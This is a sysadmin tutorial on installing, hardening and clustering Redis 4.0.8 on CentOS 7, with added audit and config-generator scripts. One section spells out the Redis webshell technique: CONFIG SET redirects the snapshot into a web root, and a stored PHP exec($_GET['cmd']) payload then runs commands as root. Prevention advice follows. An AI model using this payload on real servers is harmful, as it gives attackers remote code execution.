Installing Redis 4.0.8 on CentOS 7.x and building a Redis cluster

Posted by chrisv on Tue, 17 Mar 2020 12:24:00 +0100


Install redis

  1. Preparation before installation

    # no trailing backslash on the last line, or the shell waits for a continuation
    yum install \
    vim \
    wget \
    make \
    gcc \
    gcc-c++ \
    automake \
    autoconf \
    -y
  2. Download, unzip and install

    cd /root
    wget http://download.redis.io/releases/redis-4.0.8.tar.gz
    tar -zxvf redis-4.0.8.tar.gz
    cd redis-4.0.8
    make PREFIX=/usr/local/redis/ install
  3. Create the data and log directories referenced by the configuration

    mkdir /data
    mkdir /data/redis
    mkdir /usr/local/redis/log
  4. Add and edit the configuration file (reference settings)

    cp ./redis.conf /usr/local/redis
    vim /usr/local/redis/redis.conf
    
    # IP binding: listen only on loopback and the intranet address
    bind 127.0.0.1 192.168.0.111
    # Protected mode: when it is on and neither bind nor requirepass is set, Redis accepts
    # loopback connections only. With an explicit bind it adds no further restriction, and
    # cluster nodes that must reach each other still need a bind on the intranet address.
    protected-mode yes
    # Listening port
    port 6379
    # Idle client timeout in seconds; 0 disables it
    timeout 0
    # Run as a daemon
    daemonize yes
    # Data file directory
    dir /data/redis
    # Process ID file
    pidfile /usr/local/redis/log/redis.pid
    # Log file
    logfile /usr/local/redis/log/redis.log
    # Keyspace notifications for expired keys (E = keyevent channel, x = expired events)
    notify-keyspace-events Ex
    
    ESC
    :wq
    
    # The following security settings are recommended, not required
        # Disable dangerous commands by renaming them to an empty string
        # (EVALSHA and SCRIPT remain available unless they are renamed as well)
        rename-command FLUSHALL ""
        rename-command CONFIG   ""
        rename-command EVAL     ""
        # Require a password; AUTH can be brute-forced quickly over the network, so use a long random one
        requirepass ********
        # Bind to loopback only, if nothing on the network needs to reach Redis
        bind 127.0.0.1
  5. Performance tuning (kernel parameters)

    # Edit /etc/rc.local so the setting survives a reboot
    vim /etc/rc.local
    
    echo never > /sys/kernel/mm/transparent_hugepage/enabled
    
    ESC
    :wq
    
    # Make rc.local executable (on CentOS 7 /etc/rc.local is a symlink to /etc/rc.d/rc.local)
    chmod +x /etc/rc.d/rc.local
    
    # Edit /etc/sysctl.conf
    vim /etc/sysctl.conf
    
    vm.overcommit_memory = 1
    net.core.somaxconn = 1024
    
    ESC
    :wq
    
    # Apply the same settings immediately, without rebooting
    echo never > /sys/kernel/mm/transparent_hugepage/enabled
    echo 1024 > /proc/sys/net/core/somaxconn
    sysctl vm.overcommit_memory=1
    sysctl -p
  6. Create the service user and set directory ownership

    useradd -s /sbin/nologin -M redis
    chown -R redis:redis /data/redis
    chown -R redis:redis /usr/local/redis
  7. Start Redis and enable it at boot

    # Enter the unit file directory
    cd /etc/systemd/system
    
    # Create the redis unit file, named [unit name].[unit type]
    vim redis.service
    
    [Unit]
    Description=Start redis on boot.
    # Order after the network only. default.target is normally multi-user.target, which this
    # unit is wanted by, so After=default.target would create an ordering cycle.
    After=network.target
    
    [Service]
    User=redis
    Group=redis
    Type=forking
    PIDFile=/usr/local/redis/log/redis.pid
    ExecStart=/usr/local/redis/bin/redis-server /usr/local/redis/redis.conf
    # Redis ignores SIGHUP and does not reload its configuration, so an ExecReload that sends HUP does nothing.
    # SIGTERM triggers a clean shutdown (save, then exit); SIGQUIT is not handled by Redis and would kill it without saving.
    ExecStop=/bin/kill -s TERM $MAINPID
    PrivateTmp=false
    Restart=always
    
    [Install]
    WantedBy=multi-user.target
    
    ESC
    :wq
    
    # Only root should be able to edit the unit file (it is a single file, so no -R)
    chown root:root /etc/systemd/system/redis.service
    chmod 644 /etc/systemd/system/redis.service
    
    # Update systemd
    systemctl daemon-reload
    systemctl enable redis
    systemctl start redis
  8. Store a value and read it back (add -a [password] if requirepass is set)

    /usr/local/redis/bin/redis-cli -h 127.0.0.1
    
    set num 123
    save
    get num
    quit
  9. Delete all keys matching a pattern

    /usr/local/redis/bin/redis-cli keys '[pattern]' | xargs /usr/local/redis/bin/redis-cli del
    # KEYS walks the whole keyspace in one blocking call; on a large instance prefer
    # redis-cli --scan --pattern '[pattern]', which iterates with SCAN instead.
    # In a cluster each node only returns its own keys.

Redis fails to start after a crash because the AOF file is corrupt

  1. Back up the AOF file first
  2. Repair the damaged AOF file (the fix truncates the file at the first invalid entry, so keep the backup)

    /usr/local/redis/bin/redis-check-aof --fix [AOF filename]
  3. Restart Redis

How the Redis webshell vulnerability is exploited


  1. Why this works

    1. Redis lets a client change `dir` and `dbfilename` at runtime with CONFIG SET (from redis-cli,
      for example), without restarting the service;
    2. If `dir /www/` and `dbfilename test.php` are set, the next SAVE writes the RDB snapshot to
      /www/test.php.

    The snapshot is a binary file, but the stored values appear in it verbatim. If /www/ is the web
    root, /www/test.php becomes an entry point into the server: PHP passes the binary bytes through
    as output and executes whatever sits inside the `<?php ... ?>` tag.

  2. A vulnerable setup (this is a negative example, do not copy it)

    1. Redis runs as root
    2. Nginx starts as root and its worker processes also run as root
    3. The web server is Nginx, configured as follows:

      server {
          listen       x;
          server_name  xxx.xxx.com;
          root         /www;
      
          location / {
              index    index.php index.html index.htm;
          }
      
          location ~ \.php$ {
              fastcgi_index  index.php;
              fastcgi_pass   127.0.0.1:9000;
              fastcgi_param  SCRIPT_NAME      $fastcgi_script_name;
              fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
              include        fastcgi_params;
          }
      }
    4. The following commands are run through redis-cli (no password is set, so any client that can reach the port can do this)

      config set dir /www/
      config set dbfilename test.php
      set test "<?php exec($_GET['cmd']); ?>"
      save
    5. The result

      1. /www/test.php now exists and can be fetched at http://xxx.xxx.com/test.php
      2. Requesting http://xxx.xxx.com/test.php?cmd=xxx runs xxx as root (xxx is any Linux command)

Preventing the Redis webshell vulnerability

  1. Do not expose Redis web management tools in production
  2. Run Redis as a low-privilege user (preferably with a non-obvious name such as rediser), so a file it writes cannot land in a web root it does not own
  3. Make Redis reachable only from localhost and the intranet. bind takes addresses, not subnets (bind 127.0.0.1 192.168.0.12); restrict the rest of the network with the firewall, and set requirepass for the clients that remain
  4. Disable the CONFIG command (rename-command CONFIG "" in the configuration file), so dir and dbfilename cannot be changed at runtime
  5. Run the web server's worker processes as a low-privilege user (the webshell runs as a child of the web server, so it inherits that user)
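The weak configuration beside the hardened one, as an added example that is not part of the original post: a POSIX shell audit that flags the settings the prevention list above addresses (no bind, protected-mode off, no requirepass, CONFIG still callable). The two sample configuration files are constructed here in temporary files; the directive names are the ones from this page.

```shell
#!/bin/sh
# Added example, not from the original post: audit a redis.conf for the settings
# that make the CONFIG SET dir/dbfilename webshell trick possible, run against a
# constructed weak configuration and a constructed hardened one.
# Assumptions: stock redis.conf syntax (one directive per line, '#' comments);
# the directives checked are the ones the page discusses.

# conf_get FILE DIRECTIVE -> value of the last uncommented occurrence, or nothing
conf_get() {
    sed -n "s/^[[:space:]]*$2[[:space:]]\{1,\}//p" "$1" | tail -n 1
}

# audit_redis_conf FILE -> prints one finding per line; exit status = finding count
audit_redis_conf() {
    f=$1 n=0
    bind=$(conf_get "$f" bind)
    if [ -z "$bind" ]; then
        echo "no bind directive: Redis listens on every interface"; n=$((n+1))
    else
        case " $bind " in *" 0.0.0.0 "*)
            echo "bind includes 0.0.0.0: reachable from every interface"; n=$((n+1));;
        esac
    fi
    if [ "$(conf_get "$f" protected-mode)" = "no" ]; then
        echo "protected-mode no: loopback-only fallback switched off"; n=$((n+1))
    fi
    pass=$(conf_get "$f" requirepass)
    if [ -z "$pass" ] || [ "$pass" = '""' ]; then
        echo "requirepass unset: anyone who can connect may run CONFIG SET and SAVE"; n=$((n+1))
    fi
    if ! grep -Eiq '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]' "$f"; then
        echo "CONFIG not renamed: dir and dbfilename can be changed at runtime"; n=$((n+1))
    fi
    return "$n"
}

# audit_count FILE -> number of findings, as text (handy for scripts)
audit_count() {
    audit_redis_conf "$1" | wc -l | tr -d ' '
}

# Constructed samples: the page's "negative example" versus the hardened settings
WEAK_CONF=$(mktemp) HARD_CONF=$(mktemp)
trap 'rm -f "$WEAK_CONF" "$HARD_CONF"' EXIT
cat > "$WEAK_CONF" <<'EOF'
# constructed: no bind, no password, CONFIG reachable, web root as data dir
port 6379
protected-mode no
dir /www/
dbfilename dump.rdb
EOF
cat > "$HARD_CONF" <<'EOF'
# constructed: the settings from the prevention list
bind 127.0.0.1 192.168.0.12
protected-mode yes
port 6379
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /data/redis
EOF

for c in "$WEAK_CONF" "$HARD_CONF"; do
    echo "== $c"
    audit_redis_conf "$c" && echo "   no findings"
done
```

Point it at a real file with audit_redis_conf /usr/local/redis/redis.conf; a non-zero exit status means at least one finding. It only reads the file, so it cannot tell whether dir points inside a web root or whether the process runs as root; check those by hand.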

redis cluster

  1. Pre-cluster setup (test with two instances on one machine, ports 6379 and 6380)

    # Intranet IP: 192.168.0.100
    # Two instances are enough to exercise the configuration, but redis-trib.rb refuses to create
    # a cluster with fewer than 3 masters (6 instances with --replicas 1); add nodes the same way.
  2. Modify redis.conf

    vim /usr/local/redis/redis.conf
    
    # Enable cluster mode
    cluster-enabled yes
    # File in which this node keeps the cluster state (written by Redis, relative to dir)
    cluster-config-file nodes-6379.conf
    # Milliseconds a node may be unreachable before it is considered failing
    cluster-node-timeout 15000
    # Keep serving the slots that still have a master even if some slots are uncovered
    cluster-require-full-coverage no
    # A slave will not attempt a failover if its link to the master has been down for longer
    # than (cluster-node-timeout * this factor) + repl-ping-slave-period
    cluster-slave-validity-factor 10
    # A master keeps at least this many slaves before one of them may migrate to an orphaned
    # master (with 1, a master needs two slaves before it gives one away)
    cluster-migration-barrier 1
    
    # The cluster bus listens on port + 10000 (16379 here); open it between nodes on the firewall
    
    ESC
    :wq
  3. Create per-instance configuration files

    # redis-trib.rb needs Ruby and the redis gem. The redis gem 4.x needs Ruby >= 2.2.2, newer than
    # the Ruby 2.0 that CentOS 7 ships, so on the system Ruby pin an older gem: gem install redis -v 3.3.5
    yum install ruby
    gem install redis
    
    cp /usr/local/redis/redis.conf /usr/local/redis/redis.conf.backup
    cp /usr/local/redis/redis.conf /usr/local/redis/redis-6379.conf
    cp /usr/local/redis/redis.conf /usr/local/redis/redis-6380.conf
    
    # -p because /usr/local/redis/data does not exist yet
    mkdir -p /usr/local/redis/data/6379
    mkdir -p /usr/local/redis/data/6380
  4. Modify redis-6379.conf

    vim /usr/local/redis/redis-6379.conf
    
    unixsocket /usr/local/redis/data/6379/redis.sock
    pidfile /usr/local/redis/log/redis_6379.pid
    logfile /usr/local/redis/log/redis_6379.log
    dir /usr/local/redis/data/6379/
    bind 192.168.0.100
    port 6379
    
    ESC
    :wq
  5. Modify redis-6380.conf

    vim /usr/local/redis/redis-6380.conf
    
    unixsocket /usr/local/redis/data/6380/redis.sock
    pidfile /usr/local/redis/log/redis_6380.pid
    logfile "/usr/local/redis/log/redis_6380.log"
    dir /usr/local/redis/data/6380/
    bind 192.168.0.100
    port 6380
    
    ESC
    :wq
  6. Start the instances at boot

    # The redis.service unit created in step 7 of the install still starts redis.conf on port 6379
    # and would clash with redis-6379.conf, so disable and stop it first:
    # systemctl disable redis && systemctl stop redis
    # Starting from rc.local runs both instances as root; a systemd unit per instance with
    # User=redis is preferable.
    vim /etc/rc.local
    
    /usr/local/redis/bin/redis-server /usr/local/redis/redis-6379.conf
    /usr/local/redis/bin/redis-server /usr/local/redis/redis-6380.conf
    
    ESC
    :wq
  7. Create the cluster

    # redis-trib.rb ships in the source tree extracted in step 2, not with the installed binaries
    cd /root/redis-4.0.8/src/
    # view help
    ./redis-trib.rb help
    # Join the nodes, one replica per master. With only these two nodes redis-trib.rb aborts
    # because Redis Cluster requires at least 3 master nodes; list all six nodes to proceed.
    ./redis-trib.rb create --replicas 1 192.168.0.100:6379 192.168.0.100:6380
  8. Test the cluster (-c makes redis-cli follow MOVED and ASK redirections)

    /usr/local/redis/bin/redis-cli -h 192.168.0.100 -p 6379 -c
  9. Clean shutdown (do not kill -9; SHUTDOWN saves and writes the cluster state file)

    /usr/local/redis/bin/redis-cli -h 192.168.0.100 -p 6379 shutdown
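Steps 3 to 7 above edit the same handful of directives once per instance, by hand. As an added example that is not part of the original post, the script below generates a redis-<port>.conf per node from one base file, writes a redis@.service template so the nodes start under the redis user instead of as root from rc.local, and prints the matching redis-trib.rb line. The scratch directory, the 7000-7005 port range (six nodes, the minimum for --replicas 1), the redis@ unit name and the extra hardening directives in the unit are choices made here, not taken from the page.

```shell
#!/bin/sh
# Added example, not from the original post: generate the per-port configuration
# files of steps 3-5 from one base redis.conf, write a systemd template unit so
# the nodes start as the redis user rather than as root from rc.local, and print
# the redis-trib.rb command for the full node list. Paths, the 7000-7005 port
# range and the unit name redis@ are assumptions made here, not from the page.

# gen_node_conf BASE OUTDIR IP PORT -> writes OUTDIR/redis-PORT.conf, prints its path
gen_node_conf() {
    base=$1 out=$2 ip=$3 port=$4
    conf="$out/redis-$port.conf"
    mkdir -p "$out/data/$port" "$out/log"
    # keep every base directive except the ones that must differ per instance
    grep -Ev '^[[:space:]]*(bind|port|daemonize|pidfile|logfile|dir|unixsocket|cluster-enabled|cluster-config-file)[[:space:]]' \
        "$base" > "$conf" || :
    cat >> "$conf" <<EOF
# --- per-instance settings generated for port $port ---
bind $ip
port $port
daemonize yes
pidfile $out/log/redis_$port.pid
logfile $out/log/redis_$port.log
dir $out/data/$port/
unixsocket $out/data/$port/redis.sock
cluster-enabled yes
cluster-config-file nodes-$port.conf
EOF
    echo "$conf"
}

# gen_unit OUTDIR UNITDIR -> writes UNITDIR/redis@.service; enable one instance per
# port with: systemctl enable redis@7000 && systemctl start redis@7000
gen_unit() {
    out=$1 unitdir=$2
    cat > "$unitdir/redis@.service" <<EOF
[Unit]
Description=Redis cluster node on port %i
After=network.target

[Service]
User=redis
Group=redis
Type=forking
PIDFile=$out/log/redis_%i.pid
ExecStart=$out/bin/redis-server $out/redis-%i.conf
# SIGTERM makes Redis save and exit cleanly; Redis ignores SIGHUP, so there is no ExecReload
ExecStop=/bin/kill -s TERM \$MAINPID
Restart=always
NoNewPrivileges=true
ProtectHome=true
PrivateTmp=true

[Install]
WantedBy=multi-user.target
EOF
    echo "$unitdir/redis@.service"
}

# gen_cluster BASE OUTDIR IP PORT... -> one config per port
gen_cluster() {
    base=$1 out=$2 ip=$3; shift 3
    for p in "$@"; do gen_node_conf "$base" "$out" "$ip" "$p"; done
}

# trib_cmd IP PORT... -> the redis-trib.rb create line for those nodes
trib_cmd() {
    ip=$1; shift
    printf '%s' "./redis-trib.rb create --replicas 1"
    for p in "$@"; do printf ' %s:%s' "$ip" "$p"; done
    printf '\n'
}

# Demo against a constructed base config in a scratch directory; on a real host
# use /usr/local/redis/redis.conf, /usr/local/redis and /etc/systemd/system.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
cat > "$WORK/redis.conf" <<'EOF'
# constructed stand-in for the page's redis.conf
bind 127.0.0.1 192.168.0.100
protected-mode yes
port 6379
daemonize yes
timeout 0
cluster-node-timeout 15000
cluster-require-full-coverage no
notify-keyspace-events Ex
EOF
NODE_IP=192.168.0.100
PORTS="7000 7001 7002 7003 7004 7005"
gen_cluster "$WORK/redis.conf" "$WORK" "$NODE_IP" $PORTS
gen_unit "$WORK" "$WORK"
trib_cmd "$NODE_IP" $PORTS
```

After generating the real files, chown -R redis:redis the data and log directories, run systemctl daemon-reload, enable redis@<port> for each port, and only then run the printed redis-trib.rb line; the cluster bus for each node listens on port + 10000, so those ports must be open between nodes too.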

Topics: Operation & Maintenance Redis PHP vim yum